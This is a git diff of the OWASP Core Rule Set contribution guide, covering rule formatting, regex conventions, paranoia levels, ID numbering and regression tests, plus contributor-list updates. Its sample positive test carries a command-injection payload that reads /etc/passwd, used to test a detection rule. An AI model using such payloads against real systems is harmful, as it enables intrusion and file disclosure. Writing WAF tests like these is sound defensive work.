+t:xxx +log +nolog +auditlog +noauditlog +msg +logdata +tag +sanitiseArg +sanitiseRequestHeader +sanitiseMatched +sanitiseMatchedBytes +ctl +ver +severity +multiMatch +initcol +setenv +setvar +expirevar +chain +skip +skipAfter +``` +- Rule operators must always be explicitly specified. Although ModSecurity defaults to using the `@rx` operator, for clarity `@rx` should always be explicitly specified when used. For example, write: +``` +SecRule ARGS "@rx foo" "id:1,phase:1,pass,t:none" +``` +instead of +``` +SecRule ARGS "foo" "id:1,phase:1,pass,t:none" +``` + * Only the tags listed in the [util/APPROVED_TAGS](util/APPROVED_TAGS) file can be added to a rule. If you want to add a new tag, you **must** add it to this file. + +## Variable Naming Conventions + +* Variable names should be lowercase and should use the characters a-z, 0-9, and underscores only. +* To reflect the different syntax between *defining* a variable (using `setvar`) and *using* a variable, the following visual distinction should be applied: + * **Variable definition:** Lowercase letters for collection name, dot as the separator, variable name. E.g.: `setvar:tx.foo_bar_variable` + * **Variable use:** Capital letters for collection name, colon as the separator, variable name. E.g.: `SecRule TX:foo_bar_variable` + +## Writing Regular Expressions + +* Use the following character class, in the stated order, to cover alphanumeric characters plus underscores and hyphens: `[a-zA-Z0-9_-]` + +### Portable Backslash Representation + +CRS uses `\x5c` to represent the backslash `\` character in regular expressions. Some of the reasons for this are: -## General Formatting Guidelines for rules contributions +* It's portable across web servers and WAF engines: it works with Apache, Nginx, and Coraza. +* It works with the [crs-toolchain](https://coreruleset.org/docs/development/crs_toolchain/) for building optimized regular expressions. - - 4 spaces per indentation level, no tabs - - no trailing whitespace at EOL or trailing blank lines at EOF - - comments are good, especially when they clearly explain the rule - - try to adhere to a 80 character line length limit - - if it is a [chained rule](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#chain), alignment should be like +The older style of representing a backslash using the character class `[\\\\]` must _not_ be used. This was previously used in CRS to get consistent results between Apache and Nginx, owing to a quirk with how Apache would "double un-escape" character escapes. For future reference, the decision was made to stop using this older method because: + +* It can be confusing and difficult to understand how it works. +* It doesn't work with [crs-toolchain](https://coreruleset.org/docs/development/crs_toolchain/). +* It doesn't work with Coraza. +* It isn't obvious how to use it in a character class, e.g., `[a-zA-Z]`. + +### Forward Slash Representation + +CRS uses literal, *unescaped* forward slash `/` characters in regular expressions. + +Regular expression engines and libraries based on PCRE use the forward slash `/` character as the default delimiter. As such, forward slashes are often escaped in regular expression patterns. In the interests of readability, CRS does *not* escape forward slashes in regular expression patterns, which may seem unusual at first to new contributors. + +If testing a CRS regular expression using a third party tool, it may be useful to change the delimiter to something other than `/` if a testing tool raises errors because a CRS pattern features unescaped forward slashes. + +### When and Why to Anchor Regular Expressions + +Engines running the OWASP CRS will use regular expressions to _search_ the input string, i.e., the regular expression engine is asked to find the first match in the input string. If an expression needs to match the entire input then the expression must be anchored appropriately. + +#### Beginning of String Anchor (^) + +It is often necessary to match something at the start of the input to prevent false positives that match the same string in the middle of another argument, for example. Consider a scenario where the goal is to match the value of `REQUEST_HEADERS:Content-Type` to `multipart/form-data`. The following regular expression could be used: + +```python +"@rx multipart/form-data" ``` - SecRule .. ..\ - "...." - SecRule .. ..\ - "..." - SecRule .. ..\ - ".." -``` - - use quotes even if there is only one action, it improves readability (e.g., use `"chain"`, not `chain`, or `"ctl:requestBodyAccess=Off"` instead of `ctl:requestBodyAccess=Off`) - - always use numbers for phases, instead of names - - format your `SecMarker` between double quotes, using UPPERCASE and separating words using hyphens. Examples are: -``` - SecMarker "END-RESPONSE-959-BLOCKING-EVALUATION" - SecMarker "END-REQUEST-910-IP-REPUTATION" -``` - - the proposed order for actions is: -``` - id - phase - allow | block | deny | drop | pass | proxy | redirect - status - capture - t:xxx - log - nolog - auditlog - noauditlog - msg - logdata - tag - sanitiseArg - sanitiseRequestHeader - sanitiseMatched - sanitiseMatchedBytes - ctl - ver - severity - multiMatch - initcol - setenv - setvar - expirevar - chain - skip - skipAfter -``` - -## Variable naming conventions - -* Variable names are lowercase using chars from `[a-z0-9_]` -* To somewhat reflect the fact that the syntax for variable usage is different when you define it (using setvar) and when you use it, we propose the following visual distinction: - * Lowercase letters for collection, dot as separator, variable name. E.g.,: `setvar:tx.foo_bar_variable` - * Capital letters for collection, colon as separator, variable name. E.g.,: `SecRule TX:foo_bar_variable` - -## Rules compliance with each Paranoia Level (PL) - -Rules in the CRS are organized in Paranoia Levels, which allows you to choose the desired level of rule checks. - -Please read file ```crs-setup.conf.example``` for an introduction and a more detailed explanation of Paranoia Levels in the section `# -- [[ Paranoia Level Initialization ]]`. - -**PL0:** - -* Modsec installed, but almost no rules - -**PL1:** - -* Default level, keep in mind that most installations will normally use this one -* If there is a complex memory consuming/evaluation rule it surely will be on upper levels, not this one -* Normally we will use atomic checks in single rules -* Confirmed matches only, all scores are allowed -* No false positives / Low FP (Try to avoid adding rules with potential false positives!) + +HTTP headers can contain multiple values, and it may be necessary to guarantee that the value being searched for is the _first_ value of the header. There are different ways to do this but the simplest one is to use the `^` caret anchor to match the beginning of the string: + +```python +"@rx ^multipart/form-data" +``` + +It will also be useful to ignore case sensitivity in this scenario: + +```python +"@rx (?i)^multipart/form-data" +``` + +#### End of String Anchor ($) + +Consider, for example, needing to find the string `/admin/content/assets/add/evil` in the `REQUEST_FILENAME`. This could be achieved with the following regular expression: + +```python +"@rx /admin/content/assets/add/evil" +``` + +If the input is changed, it can be seen that this expression can easily produce a false positive: `/admin/content/assets/add/evilbutactuallynot/nonevilfile`. If it is known that the file being searched for can't be in a subdirectory of `add` then the `$` anchor can be used to match the end of the input: + +```python +"@rx /admin/content/assets/add/evil$" +``` + +This could be made a bit more general: + +```python +"@rx /admin/content/assets/add/[a-z]+$" +``` + +#### Matching the Entire Input String + +It is sometimes necessary to match the entire input string to ensure that it _exactly_ matches what is expected. It might be necessary to find the "edit" action transmitted by WordPress, for example. To avoid false positives on variations (e.g., "myedit", "the edit", "editable", etc.), the `^` caret and `$` dollar anchors can be used to indicate that an exact string is expected. For example, to only match the _exact_ strings `edit` or `editpost`: + +```python +"@rx ^(?:edit|editpost)$" +``` + +#### Other Anchors + +Other anchors apart from `^` caret and `$` dollar exist, such as `\A`, `\G`, and `\Z` in PCRE. CRS **strongly discourages** the use of other anchors for the following reasons: + +- Not all regular expression engines support all anchors and the OWASP CRS should be compatible with as many regular expression engines as possible. +- Their function is sometimes not trivial. +- They aren't well known and would require additional documentation. +- In most cases that would justify their use the regular expression can be transformed into a form that doesn't require them, or the rule can be transformed (e.g., with an additional chain rule). + +### Use Capture Groups Sparingly + +Capture groups, i.e., parts of the regular expression surrounded by parentheses (`(` and `)`), are used to store the matched information from a string in memory for later use. Capturing input uses both additional CPU cycles and additional memory. In many cases, parentheses are *mistakenly* used for grouping and ensuring precedence. + +To group parts of a regular expression, or to ensure that the expression uses the precedence required, surround the concerning parts with `(?:` and `)`. Such a group is referred to as being "non-capturing". The following will create a capture group: + +```python +"@rx a|(b|c)d" +``` + +On the other hand, this will create a _non-capturing_ group, guaranteeing the precedence of the alternative _without_ capturing the input: + +```python +"@rx a|(?:b|c)d" +``` + +### Lazy Matching + +The question mark `?` can be used to turn "greedy" quantifiers into "lazy" quantifiers, i.e., `.+` and `.*` are greedy while `.+?` and `.*?` are lazy. Using lazy quantifiers can help with writing certain expressions that wouldn't otherwise be possible. However, in backtracking regular expression engines, like PCRE, lazy quantifiers can also be a source of performance issues. The following is an example of an expression that uses a lazy quantifier: + +```python +"@rx (?i)\.cookie\b.*?;\W*?(?:expires|domain)\W*?=" +``` + +This expression matches cookie values in HTML to detect session fixation attacks. The input string could be `document.cookie = "name=evil; domain=https://example.com";`. + +The lazy quantifiers in this expression are used to reduce the amount of backtracking that engines such as PCRE have to perform (others, such as RE2, are not affected by this). Since the asterisk `*` is greedy, `.*` would match every character in the input up to the end, at which point the regular expression engine would realize that the next character, `;`, can't be matched and it will backtrack to the previous position (`;`). A few iterations later, the engine will realize that the character `d` from `domain` can't be matched and it will backtrack again. This will happen again and again, until the `;` at `evil;` is found. Only then can the engine proceed with the next part of the expression. + +Using lazy quantifiers, the regular expression engine will instead match _as few characters as possible_. The engine will match ` ` (a space), then look for `;` and will not find it. The match will then be expanded to ` =` and, again, a match of `;` is attempted. This continues until the match is ` = "name=evil` and the engine finds `;`. While lazy matching still includes some work, in this case, backtracking would require many more steps. + +Lazy matching can have the inverse effect, though. Consider the following expression: + +```python +"@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" +``` + +It matches some HTML attributes and then expects to see `=`. Using a somewhat contrived input, the lazy quantifier will require more steps to match then the greedy version would: `style                     =`. With the lazy quantifier, the regular expression engine will expand the match by one character for each of the space characters in the input, which means 21 steps in this case. With the greedy quantifier, the engine would match up to the end in a single step, backtrack one character and then match `=` (note that `=` is included in `[\s\S]`), which makes 3 steps. + +To summarize: **be very mindful about when and why you use lazy quantifiers in your regular expressions**. + +### Possessive Quantifiers and Atomic Groups + +Lazy and greedy matching change the order in which a regular expression engine processes a regular expression. However, the order of execution does not influence the backtracking behavior of backtracking engines. + +Possessive quantifiers (e.g., `x++`) and atomic groups (e.g., `(?>x)`) are tools that can be used to prevent a backtracking engine from backtracking. They _can_ be used for performance optimization but are only supported by backtracking engines and, therefore, are not permitted in CRS rules. + +### Writing Regular Expressions for Non-Backtracking Compatibility + +Traditional regular expression engines use backtracking to solve some additional problems, such as finding a string that is preceded or followed by another string. While this functionality can certainly come in handy and has its place in certain applications, it can also lead to performance issues and, in uncontrolled environments, open up possibilities for attacks (the term "[ReDoS](https://en.wikipedia.org/wiki/ReDoS)" is often used to describe an attack that exhausts process or system resources due to excessive backtracking). + +The OWASP CRS tries to be compatible with non-backtracking regular expression engines, such as RE2, because: + +- Non-backtracking engines are less vulnerable to ReDoS attacks. +- Non-backtracking engines can often outperform backtracking engines. +- CRS aims to leave the choice of the engine to the user/system. + +To ensure compatibility with non-backtracking regular expression engines, the following operations are **not** permitted in regular expressions: + +- positive lookahead (e.g., `(?=regex)`) +- negative lookahead (e.g., `(?!regex)`) +- positive lookbehind (e.g., `(?<=regex)`) +- negative lookbehind (e.g., `(?regex)`) +- backreferences (e.g., `\1`) +- named backreferences (e.g., `(?P=name)`) +- conditionals (e.g., `(?(regex)then|else)`) +- recursive calls to capture groups (e.g., `(?1)`) +- possessive quantifiers (e.g., `(?:regex)++`) +- atomic (or possessive) groups (e.g., `(?>regex`)) + +This list is not exhaustive but covers the most important points. The [RE2 documentation](https://github.com/google/re2/wiki/Syntax) includes a complete list of supported and unsupported features that various engines offer. + +### When and How to Optimize Regular Expressions + +Optimizing regular expressions is hard. Often, a change intended to improve the performance of a regular expression will change the original semantics by accident. In addition, optimizations usually make expressions harder to read. Consider the following example of URL schemes: + +```python +mailto|mms|mumble|maven +``` + +An optimized version (produced by the [crs-toolchain]({{< ref "crs_toolchain" >}})) could look like this: + +```python +m(?:a(?:ilto|ven)|umble|ms) +``` + +The above expression is an optimization because it reduces the number of backtracking steps when a branch fails. The regular expressions in the CRS are often comprised of lists of tens or even hundreds of words. Reading such an expression in an optimized form is difficult: even the _simple_ optimized example above is difficult to read. + +In general, contributors should not try to optimize contributed regular expressions and should instead strive for clarity. New regular expressions will usually be required to be submitted as a `.ra` file for the [crs-toolchain]({{< ref "crs_toolchain" >}}) to process. In such a file, the regular expression is decomposed into individual parts, making manual optimizations much harder or even impossible (and unnecessary with the `crs-toolchain`). The `crs-toolchain` performs some common optimizations automatically, such as the one shown above. + +Whether optimizations make sense in a contribution is assessed for each case individually. + +## Rules Compliance with Paranoia Levels + +The rules in CRS are organized into **paranoia levels** (PLs) which makes it possible to define how aggressive CRS is. See the documentation on [paranoia levels](https://coreruleset.org/docs/concepts/paranoia_levels/) for an introduction and more detailed explanation. + +Each rule that is placed into a paranoia level must contain the tag `paranoia-level/N`, where *N* is the PL value, however this tag can only be added if the rule does **not** use the nolog action. + +The types of rules that are allowed at each paranoia level are as follows: + +**PL 0:** + +* ModSecurity / WAF engine installed, but almost no rules + +**PL 1:** + +* Default level: keep in mind that most installations will normally use this level +* Any complex, memory consuming evaluation rules will surely belong to a higher level, not this one +* CRS will normally use atomic checks in single rules at this level +* Confirmed matches only; all scores are allowed +* No false positives / low false positives: try to avoid adding rules with potential false positives! * False negatives could happen -**PL2:** +**PL 2:** -* Chains usage are OK +* [Chain](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v2.x%29#chain) usage is allowed * Confirmed matches use score critical -* Matches that cause false positives are limited to use score notice or warning -* Low False positive rates +* Matches that cause false positives are limited to using scores notice or warning +* Low false positive rates * False negatives are not desirable -**PL3:** +**PL 3:** -* Chains usage with complex regex look arounds and macro expansions -* Confirmed matches use score warning or critical -* Matches that cause false positives are limited to use score notice -* False positive rates increased but limited to multiple matches (not single string) +* Chain usage with complex regular expression look arounds and macro expansions are allowed +* Confirmed matches use scores warning or critical +* Matches that cause false positives are limited to using score notice +* False positive rates are higher but limited to multiple matches (not single strings) * False negatives should be a very unlikely accident -**PL4:** +**PL 4:** * Every item is inspected -* Variable creations allowed to avoid engine limitations -* Confirmed matches use score notice, warning or critical -* Matches that cause false positives are limited to use score notice and warning -* False positive rates increased (even on single string) -* False negatives should not happen here -* Check everything against RFC and white listed values for most popular elements - +* Variable creations are allowed to avoid engine limitations +* Confirmed matches use scores notice, warning, or critical +* Matches that cause false positives are limited to using scores notice or warning +* False positive rates are higher (even on single strings) +* False negatives should not happen at this level +* Check everything against RFCs and allow listed values for the most popular elements ## ID Numbering Scheme -The CRS project used the numerical id rule namespace from 900,000 to 999,999 for the CRS rules as well as 9,000,000 to 9,999,999 for default CRS rule exclusion packages. +The CRS project uses the numerical ID rule namespace from 900,000 to 999,999 for CRS rules, as well as 9,000,000 to 9,999,999 for default CRS rule exclusion packages and plugins. + +- Rules applying to the **incoming request** use the ID range 900,000 to 949,999. +- Rules applying to the **outgoing response** use the ID range 950,000 to 999,999. + +The rules are grouped by the vulnerability class they address (SQLi, RCE, etc.) or the functionality they provide (e.g., initialization). These groups occupy blocks of thousands (e.g., SQLi: 942,000 - 942,999). These grouped rules are defined in files dedicated to a single group or functionality. The filename takes up the first three digits of the rule IDs defined within the file (e.g., SQLi: `REQUEST-942-APPLICATION-ATTACK-SQLI.conf`). + +The individual rules within each file for a vulnerability class are organized by the paranoia level of the rules. PL 1 is first, then PL 2, etc. + +The ID block 9xx000 - 9xx099 is reserved for use by CRS helper functionality. There are no blocking or filtering rules in this block. + +Among the rules providing CRS helper functionality are rules that skip other rules depending on the paranoia level. These rules always use the following reserved rule IDs: 9xx011 - 9xx018, with very few exceptions. + +The blocking and filter rules start at 9xx100 with a step width of 10, e.g., 9xx100, 9xx110, 9xx120, etc. + +The ID of a rule does not correspond directly with its paranoia level. Given the size of rule groups and how they're organized by paranoia level (starting with the lower PL rules first), PL 2 and above tend to be composed of rules with higher ID numbers. -Rules applying to the incoming request use the id range 900,000 to 949,999. -Rules applying to the outgoing response use the id range 950,000 to 999,999. +### Stricter Siblings -The rules are grouped by vulnerability class they address (SQLi, RCE, etc.) or functionality (initialization). These groups occupy blocks of thousands (e.g. SQLi: 942,000 - 942,999). -The grouped rules are defined in files dedicated to a single group or functionality. The filename takes up the first three digits of the rule ids defined within the file (e.g. SQLi: REQUEST-942-APPLICATION-ATTACK-SQLI.conf). +Within a rule file / block, there are sometimes smaller groups of rules that belong together. They're closely linked and very often represent copies of the original rules with a stricter limit (alternatively, they can represent the same rule addressing a different *target* in a second rule, where this is necessary). These are **stricter siblings** of the base rule. Stricter siblings usually share the first five digits of the rule ID and raise the rule ID by one, e.g., a base rule at 9xx160 and a stricter sibling at 9xx161. + +Stricter siblings often have different paranoia levels. This means that the base rule and the stricter siblings don't usually reside next to each another in the rule file. Instead, they're ordered by paranoia level and are linked by the first digits of their rule IDs. It's good practice to introduce all stricter siblings together as part of the definition of the base rule: this can be done in the comments of the base rule. It's also good practice to refer back to the base rule with the keywords "stricter sibling" in the comments of the stricter siblings themselves. For example: "...This is performed in two separate stricter siblings of this rule: 9xxxx1 and 9xxxx2", and "This is a stricter sibling of rule 9xxxx0." + +## Writing Tests + +Each rule should be accompanied by tests. Rule tests are an invaluable way to check that a rule behaves as expected: + +- Does the rule correctly match against the payloads and behaviors that the rule is designed to detect? (**Positive tests**) +- Does the rule correctly **not** match against legitimate requests, i.e., the rule doesn't cause obvious false positives? (**Negative tests**) + +Rule tests also provide an excellent way to test WAF engines and implementations to ensure they behave and execute CRS rules as expected. + +The rule tests are located under `tests/regression/tests`. Each CRS rule *file* has a corresponding *directory* and each individual *rule* has a corresponding *YAML file* containing all the tests for that rule. For example, the tests for rule 911100 *(Method is not allowed by policy)* are in the file `REQUEST-911-METHOD-ENFORCEMENT/911100.yaml`. + +Full documentation of the required formatting and available options of the YAML tests can be found at https://github.com/coreruleset/ftw/blob/main/docs/YAMLFormat.md. + +Documentation on how to run the CRS test suite can be found in the [online documentation](https://coreruleset.org/docs/development/testing/). + +### Positive Tests + +Example of a simple *positive test*: + +```yaml +- test_title: 932230-26 + desc: "Unix command injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log_contains: id "932230" +``` + +This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert. + +It's important that tests consistently include the HTTP header fields `Host`, `User-Agent`, and `Accept`. CRS includes rules that detect if these headers are missing or empty, so these headers should be included in each test to avoid unnecessarily causing those rules to match. Ideally, *each positive test should cause* **only** *the rule in question to match*. + +The rule's description field, `desc`, is important. It should describe what is being tested: what *should* match, what should *not* match, etc. + +### Negative Tests + +Example of a simple *negative test*: + +```yaml +- test_title: 932260-4 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: '/post' + output: + no_log_contains: id "932260" +``` + +This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert. + +### Encoded and Raw Requests + +It is possible to *encode* an entire test request. This encapsulates the request and means that the request headers and payload don't need to be explicitly declared. This is useful when a test request needs to use unusual bytes which might break YAML parsers, or when a test request must be intentionally malformed in a way that is impossible to describe otherwise. An encoded request is sent exactly as intended. + +The `encoded_request` field works like so: + +```yaml +encoded_request: +``` + +For example: +```yaml +encoded_request: "R0VUIFwgSFRUUA0KDQoK" +``` + +where `R0VUIFwgSFRUUA0KDQoK` is the base64-encoded equivalent of `GET \ HTTP\r\n\r\n`. + +The older method of using `raw_request` is deprecated as it's difficult to maintain and less portable than `encoded_request`. + +### Using The Correct HTTP Endpoint + +The CRS project uses [kennthreitz/httpbin](https://hub.docker.com/r/kennethreitz/httpbin) as the backend server for tests. This backend provides one dedicated endpoint for each HTTP method. Tests should target these endpoints to: + +- improve test throughput (prevent HTML from being returned by the backend) +- add automatic HTTP method verification (the backend will respond with status code `405` (method not allowed) to requests whose method does not match the endpoint) + +Test URIs should be structured as follows, where `` must be replaced by the name of the HTTP method the test uses: + +```yaml +#... + method: + uri: //some/arbitrary/url +#... +``` -The individual rule files for the vulnerability classes are organized by the paranoia level of the rules. PL 1 is first, then PL 2 etc. +## Further Guidance on Rule Writing -The block from 9XX000 - 9XX099 is reserved for use by CRS helper functionality. There are no blocking or filtering rules in this block. +### Leaving Audit Log Configuration Unchanged -Among the rules serving a CRS helper functionality are rules that skip rules depending on the paranoia level. These rules always use the following reserved rule ids: 9XX011-9XX018 with very few exceptions. +Former versions of CRS dynamically included the HTTP response body in the audit log via special `ctl` statements on certain individual response rules. This was never applied in a systematic way and, regardless, CRS should not change the format of the audit log by itself, namely because this can lead to information leakages. Therefore, the use of `ctl:auditLogParts=+E` or any other form of `ctl:auditLogParts` is not allowed in CRS rules. -The blocking or filter rules start with 9XX100 with a step width of 10. E.g. 9XX100, 9XX110, 9XX120 etc. The rule id does not correspond directly with the paranoia level of a rule. Given the size of a rule group and the organization by lower PL rules first, PL2 and above tend to have rule IDs with higher numbers. +## Non-Rules General Guidelines -Within a rule file / block, there are sometimes smaller groups of rules that belong to together. They are closely linked and very often represent copies of the original rules with a stricter limit (alternatively, they can represent the same rule addressing a different target in a second rule where this was necessary). These are stricter siblings of the base rule. Stricter siblings usually share the first five digits of the rule ID and raise the rule ID by one. E.g., Base rule at 9XX160, stricter sibling at 9XX161. +* Remove trailing spaces from files (if they're not needed). This will make linters happy. +* EOF should have an EOL. -Stricter siblings often have a different paranoia level. This means that the base rule and the stricter sibling do not reside next to one another in the rule file. Instead they are ordered in their appropriate paranoia level and can be linked via the first digits of the rule id. It is a good practice to introduce stricter siblings together with the base rule in the comments of the base rule and to reference the base rule with the keyword stricter sibling in the comments of the stricter sibling. E.g., "... This is -performed in two separate stricter siblings of this rule: 9XXXX1 and 9XXXX2", "This is a stricter sibling of rule 9XXXX0." +The `pre-commit` framework can be used to check for and fix these issues automatically. First, go to the [pre-commit](https://pre-commit.com/) website and download the framework. Then, after installing, use the command `pre-commit install` so that the tools are installed and run each time a commit is made. CRS provides a config file that will keep the repository clean. diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md index c34a742365..28f86dfbef 100644 --- a/CONTRIBUTORS.md +++ b/CONTRIBUTORS.md @@ -2,59 +2,82 @@ ## Project Co-Leads: -- [Chaim Sanders](https://github.com/csanders-git) - [Christian Folini](https://github.com/dune73) - [Walter Hop](https://github.com/lifeforms) +- [Felipe Zipitría](https://github.com/fzipi) ## Developers: +- [Paul Beckett](https://github.com/53cur3M3) - [Franziska Bühler](https://github.com/franbuehler) - [Christoph Hansen](https://github.com/emphazer) - [Ervin Hegedus](https://github.com/airween) -- [Victor Hora](https://github.com/victorhora) +- [Andrew Howe](https://github.com/RedXanadu) +- [Karel Knibbe](https://github.com/karelorigin) +- [Max Leske](https://github.com/theseion) - [Andrea Menin](https://github.com/theMiddleBlue) +- [Matteo Pace](https://github.com/M4tteoP) +- [Jitendra Patro](https://github.com/Xhoenix) +- [Chaim Sanders](https://github.com/csanders-git) - [Federico G. Schwindt](https://github.com/fgsch) -- [Manuel Spartan](https://github.com/spartantri) -- [Felipe Zimmerle](https://github.com/zimmerle) -- [Felipe Zipitría](https://github.com/fzipi) +- [Manuel Leos Rivas](https://github.com/spartantri) +- [Simon Studer](https://github.com/studersi) +- [Jozef Sudolský](https://github.com/azurit) ## Contributors: - [agusmu](https://github.com/agusmu) +- [Amir Hosein Aliakbarian](https://github.com/AmirHoseinAliakbarian) - [Zack Allen](https://github.com/zmallen) - [azhao155](https://github.com/azhao155) -- [azurit](https://github.com/azurit) - [Matt Bagley](https://github.com/bagley) - [Ryan Barnett](https://github.com/rcbarnett) -- [soufianebenali](https://github.com/soufianebenali) +- [Soufiane Benali](https://github.com/soufianebenali) - [Peter Bittner](https://github.com/bittner) - [Allan Boll](https://github.com/allanbomsft) - [Jeremy Brown](https://github.com/jwbrown77) +- [Esad Cetiner](https://github.com/esadcetiner/) - [Brent Clark](https://github.com/brentclark) - [Jonathan Claudius](https://github.com/claudijd) - [coolt](https://github.com/coolt) +- [Hussein Daher](https://github.com/hussein98d) +- [Abu Dawud](https://github.com/abudawud) - [Ashish Dixit](https://github.com/tundal45) +- [Mirko Dziadzka](https://github.com/mirkodziadzka-avi) - [Padraig Doran](https://github.com/padraigdoran) - [Dan Ehrlich](https://github.com/danehrlich1) +- [İlteriş Eroğlu](https://github.com/linuxgemini) - [Umar Farook](https://github.com/umarfarook882) +- [flo405](https://github.com/flo405) +- [Fregf](https://github.com/Fregf) - [FrozenSolid](https://github.com/frozenSolid) - [Pásztor Gábor](https://github.com/gpasztor87) +- [Jan Gora](https://github.com/terjanq) - [Aaron Haaf](https://github.com/Everspace) - [Michael Haas](https://github.com/MichaelHaas) +- [henkworks](https://github.com/henkworks) +- [Tim Herren](https://github.com/nerrehmit) +- [Victor Hora](https://github.com/victorhora) +- [itsTheFae](https://github.com/itsTheFae) - [jamuse](https://github.com/jamuse) - [jeremyjpj0916](https://github.com/jeremyjpj0916) - [jschleus](https://github.com/jschleus) +- [k4n5ha0](https://github.com/k4n5ha0) +- [kam821](https://github.com/kam821) +- [Katherine](https://github.com/katef) +- [kyzentun](https://github.com/kyzentun) +- [Joost de Keijzer](https://github.com/joostdekeijzer) - [Krzysztof Kotowicz](https://github.com/koto) -- [Max Leske](https://github.com/theseion) -- Manuel Leos - [Evgeny Marmalstein](https://github.com/shimshon70) - [meetug](https://github.com/meetug) - [Christian Mehlmauer](https://github.com/FireFart) +- [Pinaki Mondal](https://github.com/0xinfection) - [Glyn Mooney](https://github.com/skidoosh) - [na1ex](https://github.com/na1ex) - [Jose Nazario](https://github.com/paralax) -- [Tim Herren](https://github.com/nerrehmit) - [Scott O'Neil](https://github.com/cPanelScott) +- [NiceYouKnow](https://github.com/NiceYouKnow) +- [nobletrout](https://github.com/nobletrout) - [Fernando Outeda](https://github.com/fog94) - [NullIsNot0](https://github.com/NullIsNot0) - [Robert Paprocki](https://github.com/p0pr0ck5) @@ -62,15 +85,22 @@ - [Elia Pinto](https://github.com/yersinia) - [pyllyukko](https://github.com/pyllyukko) - [Brian Rectanus](https://github.com/b1v1r) +- [Vandan Rohatgi](https://github.com/vandanrohatgi) - [Rufus125](https://github.com/Rufus125) - Ofer Shezaf +- [Takaya Saeki](https://github.com/nullpo-head) - Breno Silva +- [Deepshikha Sinha](https://github.com/deepshikha-s) - siric\_ - Emile-Hugo Spir +- [somechris](https://github.com/somechris) - [Marc Stern](https://github.com/marcstern) -- [Simon Studer](https://github.com/studersi) - [supplient](https://github.com/supplient) -- [theMiddle](https://github.com/theMiddleBlue) +- [Mike Taylor](https://github.com/miketaylr) +- [ThanhPT](https://github.com/nevol1708) +- [Timo](https://github.com/ntimo) +- [Juan-Pablo Tosso](https://github.com/jptosso) +- [vijayasija99](https://github.com/vijayasija99) - [Ben Williams](https://github.com/benwilliams) - [Anna Winkler](https://github.com/annawinkler) - [Avery Wong](https://github.com/4v3r9) @@ -79,7 +109,35 @@ - [XeroChen](https://github.com/XeroChen) - [ygrek](https://github.com/ygrek) - [Yu Yagihashi](https://github.com/yagihash) +- [Felipe "Zimmerle" Costa](https://github.com/zimmerle) - [Zino](https://github.com/zinoe) - Josh Zlatin - [Zou Guangxian](https://github.com/zouguangxian) - [4ft35t](https://github.com/4ft35t) +- [Andy Clapson](https://github.com/Homesteady) +- [Anuraag Agrawal](https://github.com/anuraaga) +- [Christian Aistleitner](https://github.com/somechris) +- [Dennis Brown](https://github.com/MutableLoss) +- [Dexter Chang](https://github.com/dextermallo) +- [Esa Jokinen](https://github.com/oh2fih) +- [Finn Westendorf](https://github.com/wfinn) +- [Gwendal Le Coguic](https://github.com/gwen001) +- [Jean-François Viguier](https://github.com/jf-viguier) +- [Juan Pablo Tosso](https://github.com/jptosso) +- [Karel](https://github.com/karelorigin) +- [Khiem Doan](https://github.com/khiemdoan) +- [Mark Zeman](https://github.com/KramNamez) +- [Priyam Patel](https://github.com/priyam001) +- [Robert DeBoer](https://github.com/robertdeboer) +- [Somdev Sangwan](https://github.com/s0md3v) +- [Stephen Sigwart](https://github.com/ssigwart) +- [Zerorigin](https://github.com/Zerorigin) +- [Syin Wu](https://github.com/bxlxx) +- [henkdswiss](https://github.com/henkworks) +- [ignatiev](https://github.com/ignatiev) +- [oct0pus7](https://github.com/oct0pus7) +- [Timo](https://github.com/ntimo) +- [rekter0](https://github.com/rekter0) +- [ThanhPT](https://github.com/thanhpt1708) +- [Vandan Rohatgi](https://github.com/vandanrohatgi) +- [NiceYouKnow](https://github.com/NiceYouKnow) diff --git a/INSTALL b/INSTALL deleted file mode 100644 index cf83cdb77f..0000000000 --- a/INSTALL +++ /dev/null @@ -1,305 +0,0 @@ - _____ _____ _____ ____ - / ____| __ \ / ____| |___ \ - | | | |__) | (___ __) | - | | | _ / \___ \ |__ < - | |____| | \ \ ____) | ___) | - \_____|_| \_\_____/ |____/ - - OWASP Core Rule Set 3.x - -Installing ModSecurity -===================== - - This document does NOT detail how to install ModSecurity. Rather, - only information pertaining to the installation of the OWASP Core - Rule Set (CRS) is provided. However, ModSecurity is a prerequisite - for the CRS installation. Information on installing ModSecurity - can be found within the ModSecurity project at - https://github.com/SpiderLabs/ModSecurity or at ModSecurity.org. - -Installing From a Package Manager -================================= - - The OWASP Core Rule Set (CRS) is available from many sources. On - multiple platforms this includes package managers. These packages are - maintained by independent packagers who package CRS in their own time. - Historically, many of these packages have been out of date. As such, - it is recommended that you install, where possible, from our GitHub - repository. The following CRS 3.x packages are known to exist: - - modsecurity-crs - Debian - mod_security_crs - Fedora - modsecurity-crs - Gentoo - - Packages of CRS 2.x are incompatible with CRS 3.x. - -Installing -========== - - You can download a copy of the CRS from the following URL: - https://coreruleset.org/installation/ - - Our release zip/tar.gz files are the preferred way to install CRS. - - However, if you want to follow rule development closely and get - the newest protections quickly, you can also clone our GitHub - repository to get the current work-in-progress for the next release. - -Prerequisites -------------- - - CRS is designed to be used with ModSecurity (although many other - projects also use the provided rules). CRS version 3.x is designed for - ModSecurity 2.8 or above. CRS version 3.x makes use of libinjection - and libXML2. Failure to provide these prerequisites may result in - serious false negatives and CRS version 3.x should NOT be run without - these. Note, however, that libinjection is bundled with ModSecurity - since version 2.8. Additionally, if you are downloading from the - GitHub repo you will need to install 'git' on your system. - -Upgrading from CRS 2.x ----------------------- - 